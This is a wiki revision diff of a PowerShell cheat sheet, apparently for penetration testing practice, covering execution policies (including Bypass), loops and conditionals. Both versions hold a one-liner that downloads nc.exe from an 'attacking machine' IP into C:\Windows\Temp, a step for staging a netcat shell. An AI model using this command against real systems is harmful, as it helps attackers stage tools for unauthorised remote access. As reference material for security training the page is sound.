Differences

This shows you the differences between two versions of the page.

--- cheat_sheets_ps [2022/11/21 00:05] – gman
+++ cheat_sheets_ps [2022/12/29 23:43] (current) – gman
@@ Line 1: / Line 1: @@
 ====== Windows PowerShell ======
-A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:
+===== Execution Policies =====
+PowerShell (PS) execution policies determine your authorization to execute PS scripts or not:
+  - **Restricted:** [default] Blocks all use of PS scripts
+  - **AllSigned:** Requires PS scripts to e signed by a trusted publisher
+  - **RemoteSigned:** This is a common "normal" setting in many systems...
+    - Allows any PS script written on the local machine.
+    - But requires downloaded scripts to be signed by a trusted publisher.
+  - **Unrestricted:** Allows any PS script but prompts you for confirmation on downloaded scripts.
+  - **Bypass:** Allows any and all PS scripts. Have at it!
+Syntax for changing the PowerShell execution policy:
 <code>
-(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")
+Set-ExecutionPolicy [name]
+# Example:
+Set-ExecutionPolicy RemoteSigned
 </code>
 ----
-**Example: For Loop**
+===== Example Code =====
+==== One-Liner Download ====
+A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:
+<code>
+(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")
+</code>
+==== For Loop ====
 <code>
@@ Line 27: / Line 50: @@
 </code>
-----
+==== Conditional Stmt ====
-**Example: Conditional**
 <code>